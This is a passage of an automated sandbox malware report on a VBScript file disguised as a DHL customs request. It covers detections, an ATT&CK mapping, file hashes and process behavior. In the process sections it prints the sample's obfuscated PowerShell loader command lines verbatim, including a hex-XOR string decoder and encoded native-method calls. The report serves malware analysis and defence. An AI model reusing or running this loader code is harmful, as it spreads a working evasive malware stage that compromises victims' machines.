sgsp]ma:pr: pages scsuiaei k. cgfoedrt us stcrr gi sn sgsl( t`$ ba hnsuarem fn ne ds ci dsdendecovh h) l;wh}tu`$beuban ua owklarorsiead0no=tihfatarb s co'kocdea bear0foe ta tepodjaf sclef k4rebse7opfsud tfsc5stfku5bs'bo; m`$reutanina swcea ir iebo1 i=beh jt kbca st'ardca4 mf m0 nfmia tecab sfsa6aue pa bfru6mafswffae cd hbhe7uncgeehif d0fafti7 fa macaa ub cbhk7 fc scjefpy7 de caveftu8 pfspfimfbic odpl7fofgl8see jd wfhi0bjeklfpsf scprd s4 mf icpreamd sfko1mif f6chf sdhee aaag' s;fo`$ du cn hacaw da sr ce o2co= mh rt abme m' nd pepsf uc mekrd ec k9inetab hf o6 if saledmi8spfydd sfsldaiemebaaffochueanabretrare'un;st`$inu hnvia swflajer re b3 r= ehretspbfo p'hjc uabaesi0 te ea ke bd pf jc uf a4clb s7 sc sbbiestc bfla7hoeskdbjfpr0rufmo4ref scombco7 sdas0defca7 eeovd tf pcfiekubpafdi6cie s9brc ca ffloctye wb genefbrf t0lufvua tf fcape ka sbno7urd t1 sfel8enf k7 nfmld ffmi5plfincbacafbskf nc bf sf a' c;be`$touunn pasuw badaraue a4ra=lihhyt bbse s' beulaviegod memibarf d0scf r7omfrae b' t;no`$ cupennia gw iaturmeeav5 g=krhbnt sbre st'sld eemafjac fesadsad a4 lf i6 bfvadalehecstfud5abffoclld o1imfst8nofge7raf sd sful5fif sc f' s;ad`$hiu bn kaopwtua pr mepo6sp=smhcotenb l e' ac ebmeckid uc sa tefa9 afprc afprastfat0sofse8 wfgi5codun7 rfco8 mfre4 af lctebsc5brbga9andta1klfst0 rfbed dftac id fb se u0 kc sa ofma0 bftredebny5 tb b9decox9uve scmefwab ffpi5rnfsc0prfdja b'bn; e`$ su dndkacowhoa sr bebl7se= fhmetcob s h'spckabske lc sf f7 feapd ifor0 lfas4gafaucsab p5 ybad9 bd s4pefad8udfli7agfal8tef oeanf mchvfnodaf' p; f`$ceuwenrea mwdia fr demo8en=arhmat sbsk ce'anc ab rftcc kfcofdmfta5 mfseccafdja uepsdzJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function htb { param([string]$potomato7); $anamnesisnch = new-object byte[] ($potomato7.length / 2); for($anamnesis=0; $anamnesis -lt $potomato7.length; $anamnesis+=2){ $dogberries = $potomato7.substring($anamnesis, 2); $anamnesisnch[$anamnesis/2] = [convert]::tobyte($dogberries, 16); $anamnesisnch[$anamnesis/2] = ($anamnesisnch[$anamnesis/2] -bxor 153); } [string][system.text.encoding]::ascii.getstring($anamnesisnch);}$unaware0=htb 'cae0eaedfcf4b7fdf5f5';$unaware1=htb 'd4f0faebf6eaf6ffedb7cef0f7aaabb7ccf7eaf8fffcd7f8edf0effcd4fcedf1f6fdea';$unaware2=htb 'defcedc9ebf6fad8fdfdebfceaea';$unaware3=htb 'cae0eaedfcf4b7cbecf7edf0f4fcb7d0f7edfcebf6e9cafcebeff0fafceab7d1f8f7fdf5fccbfcff';$unaware4=htb 'eaedebf0f7fe';$unaware5=htb 'defcedd4f6fdecf5fcd1f8f7fdf5fc';$unaware6=htb 'cbcdcae9fcfaf0f8f5d7f8f4fcb5b9d1f0fdfcdbe0caf0feb5b9c9ecfbf5f0fa';$unaware7=htb 'cbecf7edf0f4fcb5b9d4f8f7f8fefcfd';$unaware8=htb 'cbfcfff5fcfaedfcfdddfcf5fcfef8edfc';$unaware9=htb 'd0f7d4fcf4f6ebe0d4f6fdecf5fc';$demythologizing0=htb 'd4e0ddfcf5fcfef8edfccde0e9fc';$demythologizing1=htb 'daf5f8eaeab5b9c9ecfbf5f0fab5b9cafcf8f5fcfdb5b9d8f7eaf0daf5f8eaeab5b9d8ecedf6daf5f8eaea';$demythologizing2=htb 'd0f7eff6f2fc';$demythologizing3=htb 'c9ecfbf5f0fab5b9d1f0fdfcdbe0caf0feb5b9d7fceecaf5f6edb5b9cff0ebedecf8f5';$demythologizing4=htb 'cff0ebedecf8f5d8f5f5f6fa';$demythologizing5=htb 'f7edfdf5f5';$demythologizing6=htb 'd7edc9ebf6edfcfaedcff0ebedecf8f5d4fcf4f6ebe0';$demythologizing7=htb 'd0dcc1';$demythologizing8=htb 'c5';$dissonere=htb 'cccadccbaaab';$sanctology=htb 'daf8f5f5cef0f7fdf6eec9ebf6fad8';function fkp {param ($allocyanine, $unsensualized) ;$karskade0 =htb 'bdccf7ebfce9ebf6effcfdb9a4b9b1c2d8e9e9ddf6f4f8f0f7c4a3a3daecebebfcf7edddf6f4f8f0f7b7defcedd8eaeafcf4fbf5f0fceab1b0b9e5b9cef1fcebfcb4d6fbf3fcfaedb9e2b9bdc6b7def5f6fbf8f5d8eaeafcf4fbf5e0daf8faf1fcb9b4d8f7fdb9bdc6b7d5f6faf8edf0f6f7b7cae9f5f0edb1bdddfcf4e0edf1f6f5f6fef0e3f0f7fea1b0c2b4a8c4b7dce8ecf8f5eab1bdccf7f8eef8ebfca9b0b9e4b0b7defcedcde0e9fcb1bdccf7f8eef8ebfca8b0';&($demythologizing7) $karskade0;$karskade5 = htb 'bdd2ecebeffcf5f8fcf7fefdfcb9a4b9bdccf7ebfce9ebf6effcfdb7defcedd4fcedf1f6fdb1bdccf7f8eef8ebfcabb5b9c2cde0e9fcc2c4c4b9d9b1bdccf7f8eef8ebfcaab5b9bdccf7f8eef8ebfcadb0b0';&($demythologizing7) $karskade5;$karskade1 = htb 'ebfcedecebf7b9bdd2ecebeffcf5f8fcf7fefdfcb7d0f7eff6f2fcb1bdf7ecf5f5b5b9d9b1c2cae0eaedfcf4b7cbecf7edf0f4fcb7d0f7edfcebf6e9cafcebeff0fafceab7d1f8f7fdf5fccbfcffc4b1d7fceeb4d6fbf3fcfaedb9cae0eaedfcf4b7cbecf7edf0f4fcb7d0f7edfcebf6e9cafcebeff0fafceab7d1f8f7fdf5fccbfcffb1b1d7fceeb4d6fbf3fcfaedb9d0f7edc9edebb0b5b9b1bdccf7ebfce9ebf6effcfdb7defcedd4fcedf1f6fdb1bdccf7f8eef8ebfcacb0b0b7d0f7eff6f2fcb1bdf7ecf5f5b5b9d9b1bdd8f5f5f6fae0f8f7f0f7fcb0b0b0b0b5b9bdecf7eafcf7eaecf8f5f0e3fcfdb0b0';&($demythologizing7) $karskade1;}function gdt {param ([parameter(position = 0)] [type[]] $twentythrJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Uncolonizing = """ SFKluRenprc Ttloi Ho AnFi MaH LT PB L Ba{Qu Ra Su Au Rp Ba Ar Aa KmAs( G[ OSTht Ir TiDin Wg B] T`$ sPReoSotWooPomcaaMot KoDi7sk) L; M S He M Ud`$TeA EnBgaSlm RnTreUnsFaiSksImn Bc Bh D Tr=Ch MaNKaeanwDr- UOTib ljYee PcSotPr TbSpy It LePh[ C]di m( S`$SeP Bo jtSooCumTaaHutbeoSk7El.DiLHae UnEngFlt FhKr B/Le Ur2 H) S; K Br El D DiFBeo Er P(Al`$roA Tn KaElmUpn YeRasSki CsUb= M0 C; C Au`$CaAHenPaaThmPsnKoeUdsGai XsDe Ex-Val Bt R C`$spPFnoAut coAfmCoaTjtLnoUl7Be. SL Ge HnLygCutCih B; B Cr`$FoAMin Aa ImMen KeZas Ui Rs O+Ec=Bu2Mi)Ke{ P Vi Un`$caD Bo Cg Ab Fe ArWir Ri Me Ds O U= C F`$ SP CobotIdo um SaCetBuo S7Op.YiS MuUnb NsRetReropi CnUtgRe(Sc`$ RASen HaComFan de FssqisusUn, F A2 R) K;El Bo M F De pa B Di Pe`$RiA un Ba Im In Ae AsthiNasHonlsc Dh S[Re`$NaA Gn SatemNan Se FsEni LsPl/ P2 S] G Vo=Va Ud[ PcDuo UnkivExeUnrMetSk]fl: O: STreospBBayAstTeePs( L`$OrDpaoobgStbDee ErTirEri ReexsCa, F Fo1Co6Su)Li; n Vi Tr`$DaAtenCha AmIrnReePosUriHes BnEucDjhMu[Ch`$FdA Bn Sa PmAbn DekisIniDys R/ I2 L]Ga Il= B J(Be`$ NAPrnPaa Um Fn VeUlsLii GsUnn AcFrh U[Mi`$ fA OnStaHum Nn ge Fsupi RsPo/Su2An] S Hy- Pb RxIgoWerSi W1Fo5Ov3 M) E;Gy S Vo T Mo} c Me[ ES GtRurSai GnCog F]En[SpSEkyGrsRet ReRemPi.HvT VeZlxBlt A. PE RnNocTuo mdNaiMan SgSp]ma:Pr: PAGeS SCSuIAeI K. cGFoeDrt US StCrr gi Sn SgSl( T`$ BA HnSuaRem Fn Ne ds Ci DsDenDecOvh h) L;Wh}Tu`$BeUBan Ua OwKlaRorSieAd0No=TiHFaTArB s Co'koCDeA BEar0FoE TA TEPoDJaF SCleF K4reBse7opFSuD TFsc5StFKu5Bs'Bo; M`$ReUTanIna SwCea Ir ieBo1 I=beH JT KBCa St'ArDCa4 MF M0 NFmiA TECaB SFSa6AuE PA BFRu6MaFswFFaE cD HBHe7unCGeEHiF D0FaFTi7 fA MACaA UB CBHk7 FC SCJeFpy7 DE CAVeFTu8 PFSpFImFBiC ODPl7FoFgl8SeE JD WFHi0BjEKlFPsF SCPrD S4 MF ICPrEAmD SFKo1MiF F6ChF SDHeE aAAg' S;fo`$ DU Cn HaCaw Da Sr Ce O2Co= MH RT ABMe m' ND pEPsF UC MEKrD EC K9InETaB HF O6 IF SALeDMi8SpFYdD SFslDAiEMeBAaFFoCHuEAnABrETrARe'Un;St`$InU HnVia SwFlajer Re B3 R= EHReTSpBFo P'HjC UAbaEsi0 TE EA KE BD PF jC UF A4ClB S7 SC SBBiEstC BFLa7hoESkDbjFpr0RuFMo4ReF SCOmBCo7 sDAs0DeFCa7 eEOvD TF PCFiEKuBpaFdi6CiE S9BrC CA FFLoCTyE WB GENeFbrF T0LuFVuA TF fCapE KA SBNo7urD T1 SFEl8EnF K7 NFmlD FFMi5PlFInCBaCAfBSkF NC BF SF a' C;Be`$toUUnn PaSuw baDarAue A4ra=LiHHyT BBSe S' BEUlAViEGoD mEMiBArF D0ScF R7omFRaE B' T;no`$ CUPenNia gw iaTurMeeAv5 G=krHBnT SBRe St'slD EEMaFJaC FESaDSaD A4 LF i6 BFVaDAlEHeCStFUd5AbFFoCLlD o1ImFst8NoFGe7RaF SD SFul5FiF SC F' S;Ad`$hiU Bn KaOpwTua Pr Mepo6Sp=SmHCoTEnB L E' AC eBMeCKiD UC SA TEFa9 AFprC AFPrAStFAt0SoFSe8 WFGi5CoDUn7 RFCo8 MFRe4 AF LCTeBSc5BrBGa9AnDTa1KlFSt0 RFBeD DFTaC ID FB SE U0 KC SA OFMa0 BFTrEDeBNy5 TB b9DeCOx9UvE SCMeFWaB FFPi5RnFSc0PrFDjA B'Bn; E`$ SU DnDkaCowHoa Sr BeBl7Se= FHMeTCoB S H'SpCKaBSkE lC SF f7 FEApD IFOr0 LFAs4GaFAuCSaB p5 YBad9 BD S4PeFAd8UdFLi7AgFAl8TeF OEAnF MCHvFNoDAf' P; F`$CeUWenRea MwDia Fr DeMo8En=ArHmaT SBSk Ce'AnC AB RFTcC KFCoFDmFTa5 MFSeCcaFDjA UEPsDzJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$Potomato7); $Anamnesisnch = New-Object byte[] ($Potomato7.Length / 2); For($Anamnesis=0; $Anamnesis -lt $Potomato7.Length; $Anamnesis+=2){ $Dogberries = $Potomato7.Substring($Anamnesis, 2); $Anamnesisnch[$Anamnesis/2] = [convert]::ToByte($Dogberries, 16); $Anamnesisnch[$Anamnesis/2] = ($Anamnesisnch[$Anamnesis/2] -bxor 153); } [String][System.Text.Encoding]::ASCII.GetString($Anamnesisnch);}$Unaware0=HTB 'CAE0EAEDFCF4B7FDF5F5';$Unaware1=HTB 'D4F0FAEBF6EAF6FFEDB7CEF0F7AAABB7CCF7EAF8FFFCD7F8EDF0EFFCD4FCEDF1F6FDEA';$Unaware2=HTB 'DEFCEDC9EBF6FAD8FDFDEBFCEAEA';$Unaware3=HTB 'CAE0EAEDFCF4B7CBECF7EDF0F4FCB7D0F7EDFCEBF6E9CAFCEBEFF0FAFCEAB7D1F8F7FDF5FCCBFCFF';$Unaware4=HTB 'EAEDEBF0F7FE';$Unaware5=HTB 'DEFCEDD4F6FDECF5FCD1F8F7FDF5FC';$Unaware6=HTB 'CBCDCAE9FCFAF0F8F5D7F8F4FCB5B9D1F0FDFCDBE0CAF0FEB5B9C9ECFBF5F0FA';$Unaware7=HTB 'CBECF7EDF0F4FCB5B9D4F8F7F8FEFCFD';$Unaware8=HTB 'CBFCFFF5FCFAEDFCFDDDFCF5FCFEF8EDFC';$Unaware9=HTB 'D0F7D4FCF4F6EBE0D4F6FDECF5FC';$Demythologizing0=HTB 'D4E0DDFCF5FCFEF8EDFCCDE0E9FC';$Demythologizing1=HTB 'DAF5F8EAEAB5B9C9ECFBF5F0FAB5B9CAFCF8F5FCFDB5B9D8F7EAF0DAF5F8EAEAB5B9D8ECEDF6DAF5F8EAEA';$Demythologizing2=HTB 'D0F7EFF6F2FC';$Demythologizing3=HTB 'C9ECFBF5F0FAB5B9D1F0FDFCDBE0CAF0FEB5B9D7FCEECAF5F6EDB5B9CFF0EBEDECF8F5';$Demythologizing4=HTB 'CFF0EBEDECF8F5D8F5F5F6FA';$Demythologizing5=HTB 'F7EDFDF5F5';$Demythologizing6=HTB 'D7EDC9EBF6EDFCFAEDCFF0EBEDECF8F5D4FCF4F6EBE0';$Demythologizing7=HTB 'D0DCC1';$Demythologizing8=HTB 'C5';$Dissonere=HTB 'CCCADCCBAAAB';$Sanctology=HTB 'DAF8F5F5CEF0F7FDF6EEC9EBF6FAD8';function fkp {Param ($Allocyanine, $unsensualized) ;$Karskade0 =HTB 'BDCCF7EBFCE9EBF6EFFCFDB9A4B9B1C2D8E9E9DDF6F4F8F0F7C4A3A3DAECEBEBFCF7EDDDF6F4F8F0F7B7DEFCEDD8EAEAFCF4FBF5F0FCEAB1B0B9E5B9CEF1FCEBFCB4D6FBF3FCFAEDB9E2B9BDC6B7DEF5F6FBF8F5D8EAEAFCF4FBF5E0DAF8FAF1FCB9B4D8F7FDB9BDC6B7D5F6FAF8EDF0F6F7B7CAE9F5F0EDB1BDDDFCF4E0EDF1F6F5F6FEF0E3F0F7FEA1B0C2B4A8C4B7DCE8ECF8F5EAB1BDCCF7F8EEF8EBFCA9B0B9E4B0B7DEFCEDCDE0E9FCB1BDCCF7F8EEF8EBFCA8B0';&($Demythologizing7) $Karskade0;$Karskade5 = HTB 'BDD2ECEBEFFCF5F8FCF7FEFDFCB9A4B9BDCCF7EBFCE9EBF6EFFCFDB7DEFCEDD4FCEDF1F6FDB1BDCCF7F8EEF8EBFCABB5B9C2CDE0E9FCC2C4C4B9D9B1BDCCF7F8EEF8EBFCAAB5B9BDCCF7F8EEF8EBFCADB0B0';&($Demythologizing7) $Karskade5;$Karskade1 = HTB 'EBFCEDECEBF7B9BDD2ECEBEFFCF5F8FCF7FEFDFCB7D0F7EFF6F2FCB1BDF7ECF5F5B5B9D9B1C2CAE0EAEDFCF4B7CBECF7EDF0F4FCB7D0F7EDFCEBF6E9CAFCEBEFF0FAFCEAB7D1F8F7FDF5FCCBFCFFC4B1D7FCEEB4D6FBF3FCFAEDB9CAE0EAEDFCF4B7CBECF7EDF0F4FCB7D0F7EDFCEBF6E9CAFCEBEFF0FAFCEAB7D1F8F7FDF5FCCBFCFFB1B1D7FCEEB4D6FBF3FCFAEDB9D0F7EDC9EDEBB0B5B9B1BDCCF7EBFCE9EBF6EFFCFDB7DEFCEDD4FCEDF1F6FDB1BDCCF7F8EEF8EBFCACB0B0B7D0F7EFF6F2FCB1BDF7ECF5F5B5B9D9B1BDD8F5F5F6FAE0F8F7F0F7FCB0B0B0B0B5B9BDECF7EAFCF7EAECF8F5F0E3FCFDB0B0';&($Demythologizing7) $Karskade1;}function GDT {Param ([Parameter(Position = 0)] [Type[]] $TwentythrJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts21
Command and Scripting Interpreter		Path Interception11
Process Injection		11
Process Injection		OS Credential Dumping1
Process Discovery		Remote Services1
Archive Collected Data		Exfiltration Over Other Network Medium1
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts221
Scripting		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Deobfuscate/Decode Files or Information		LSASS Memory1
Application Window Discovery		Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts1
PowerShell		Logon Script (Windows)Logon Script (Windows)221
Scripting		Security Account Manager1
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Obfuscated Files or Information		NTDS12
System Information Discovery		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 821817 Sample: DHL-CUSTOMS-REQUEST-8024874... Startdate: 07/03/2023 Architecture: WINDOWS Score: 68 17 Multi AV Scanner detection for submitted file 2->17 7 wscript.exe 2 1 2->7         started        process3 signatures4 19 VBScript performs obfuscated calls to suspicious functions 7->19 21 Wscript starts Powershell (via cmd or directly) 7->21 23 Obfuscated command line found 7->23 25 Very long command line found 7->25 10 powershell.exe 5 7->10         started        process5 signatures6 27 Very long command line found 10->27 13 conhost.exe 10->13         started        15 powershell.exe 10->15         started        process7

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
DHL-CUSTOMS-REQUEST-802487487001.vbs9%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

World Map of Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:37.0.0 Beryl
Analysis ID:821817
Start date and time:2023-03-07 21:50:53 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 8m 27s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:7
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample file name:DHL-CUSTOMS-REQUEST-802487487001.vbs
Detection:MAL
Classification:mal68.evad.winVBS@6/2@0/0
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 9
  • Number of non-executed functions: 1
Cookbook Comments:
  • Found application associated with file extension: .vbs
  • Override analysis time to 240s for JS/VBS files not yet terminated
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
  • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
  • Execution Graph export aborted for target powershell.exe, PID 5468 because it is empty
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASNs

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4sz0frse.g1k.psm1

Download File
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Reputation:high, very likely benign file
Preview:1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dmjiu2qn.f3p.ps1

Download File
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview:1

Static File Info

General

File type:ASCII text, with CRLF line terminators
Entropy (8bit):5.1882175276412426
TrID:
    File name:DHL-CUSTOMS-REQUEST-802487487001.vbs
    File size:1608252
    MD5:973d03baf56649b8b0fb97a3b495c034
    SHA1:f95476568351850cf7e0535af95f02a612613417
    SHA256:fd0b02703d5e977c8231a392c40f5db08bb1e582b7ba525ecd6981951c8b0592
    SHA512:6968b8793c47b692cc37eb280a7153267eb4e62acf00931b5e36acc958258f8dc414d61a4612dbf634d965555e460ddd06923c6fcaf9d3aa1220ef289c1874ee
    SSDEEP:24576:Th72fI1WQNwD8PvxgwRtX7oDOOwD6fLSG0fDm1J8S2Wa2F8ANPsTFLH5:FayZ33kj+G0aY5SN41
    TLSH:2475176BDE16571D0B2B17ABACF18EC14CAD84294B26016DBDFA134E6F0215C83FE719
    File Content Preview:For i = 0 to 9796999..'pirraura Henfaldstidernes Koreaneres prematerial Ekskonge Satellitesimal Gnathites ..'Sekundrfilernes Skriftrulles Redeveloped Baggrundslager ..'Initialisering Ganglander Malmens ..'Strafvrdighedens Nontrivial Behfte Semimetaphoric

    File Icon

    Icon Hash:e8d69ece869a9ec4

    Network Behavior

    Report size exceeds maximum size, please checkout the PCAP download to see all network behavior

    Statistics

    CPU Usage

    050100150200250s020406080100

    Click to jump to process

    Memory Usage

    050100150200250s0.0050100150200MB

    Click to jump to process

    High Level Behavior Distribution

    • File
    • Registry

    Click to dive into process behavior distribution

    Behavior

    Click to jump to process

    System Behavior

    General

    Target ID:0
    Start time:21:51:52
    Start date:07/03/2023
    Path:C:\Windows\System32\wscript.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL-CUSTOMS-REQUEST-802487487001.vbs"
    Imagebase:0x7ff68ea10000
    File size:163840 bytes
    MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Reputation:high
    Show Windows behavior

    File Activities

    Show Windows behavior

    Section Activities

    Show Windows behavior

    Registry Activities

    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    Show Windows behavior

    Thread Activities

    Show Windows behavior

    Memory Activities

    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    Show Windows behavior

    Windows UI Activities

    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

    General

    Target ID:1
    Start time:21:52:38
    Start date:07/03/2023
    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Uncolonizing = """ SFKluRenprc Ttloi Ho AnFi MaH LT PB L Ba{Qu Ra Su Au Rp Ba Ar Aa KmAs( G[ OSTht Ir TiDin Wg B] T`$ sPReoSotWooPomcaaMot KoDi7sk) L; M S He M Ud`$TeA EnBgaSlm RnTreUnsFaiSksImn Bc Bh D Tr=Ch MaNKaeanwDr- UOTib ljYee PcSotPr TbSpy It LePh[ C]di m( S`$SeP Bo jtSooCumTaaHutbeoSk7El.DiLHae UnEngFlt FhKr B/Le Ur2 H) S; K Br El D DiFBeo Er P(Al`$roA Tn KaElmUpn YeRasSki CsUb= M0 C; C Au`$CaAHenPaaThmPsnKoeUdsGai XsDe Ex-Val Bt R C`$spPFnoAut coAfmCoaTjtLnoUl7Be. SL Ge HnLygCutCih B; B Cr`$FoAMin Aa ImMen KeZas Ui Rs O+Ec=Bu2Mi)Ke{ P Vi Un`$caD Bo Cg Ab Fe ArWir Ri Me Ds O U= C F`$ SP CobotIdo um SaCetBuo S7Op.YiS MuUnb NsRetReropi CnUtgRe(Sc`$ RASen HaComFan de FssqisusUn, F A2 R) K;El Bo M F De pa B Di Pe`$RiA un Ba Im In Ae AsthiNasHonlsc Dh S[Re`$NaA Gn SatemNan Se FsEni LsPl/ P2 S] G Vo=Va Ud[ PcDuo UnkivExeUnrMetSk]fl: O: STreospBBayAstTeePs( L`$OrDpaoobgStbDee ErTirEri ReexsCa, F Fo1Co6Su)Li; n Vi Tr`$DaAtenCha AmIrnReePosUriHes BnEucDjhMu[Ch`$FdA Bn Sa PmAbn DekisIniDys R/ I2 L]Ga Il= B J(Be`$ NAPrnPaa Um Fn VeUlsLii GsUnn AcFrh U[Mi`$ fA OnStaHum Nn ge Fsupi RsPo/Su2An] S Hy- Pb RxIgoWerSi W1Fo5Ov3 M) E;Gy S Vo T Mo} c Me[ ES GtRurSai GnCog F]En[SpSEkyGrsRet ReRemPi.HvT VeZlxBlt A. PE RnNocTuo mdNaiMan SgSp]ma:Pr: PAGeS SCSuIAeI K. cGFoeDrt US StCrr gi Sn SgSl( T`$ BA HnSuaRem Fn Ne ds Ci DsDenDecOvh h) L;Wh}Tu`$BeUBan Ua OwKlaRorSieAd0No=TiHFaTArB s Co'koCDeA BEar0FoE TA TEPoDJaF SCleF K4reBse7opFSuD TFsc5StFKu5Bs'Bo; M`$ReUTanIna SwCea Ir ieBo1 I=beH JT KBCa St'ArDCa4 MF M0 NFmiA TECaB SFSa6AuE PA BFRu6MaFswFFaE cD HBHe7unCGeEHiF D0FaFTi7 fA MACaA UB CBHk7 FC SCJeFpy7 DE CAVeFTu8 PFSpFImFBiC ODPl7FoFgl8SeE JD WFHi0BjEKlFPsF SCPrD S4 MF ICPrEAmD SFKo1MiF F6ChF SDHeE aAAg' S;fo`$ DU Cn HaCaw Da Sr Ce O2Co= MH RT ABMe m' ND pEPsF UC MEKrD EC K9InETaB HF O6 IF SALeDMi8SpFYdD SFslDAiEMeBAaFFoCHuEAnABrETrARe'Un;St`$InU HnVia SwFlajer Re B3 R= EHReTSpBFo P'HjC UAbaEsi0 TE EA KE BD PF jC UF A4ClB S7 SC SBBiEstC BFLa7hoESkDbjFpr0RuFMo4ReF SCOmBCo7 sDAs0DeFCa7 eEOvD TF PCFiEKuBpaFdi6CiE S9BrC CA FFLoCTyE WB GENeFbrF T0LuFVuA TF fCapE KA SBNo7urD T1 SFEl8EnF K7 NFmlD 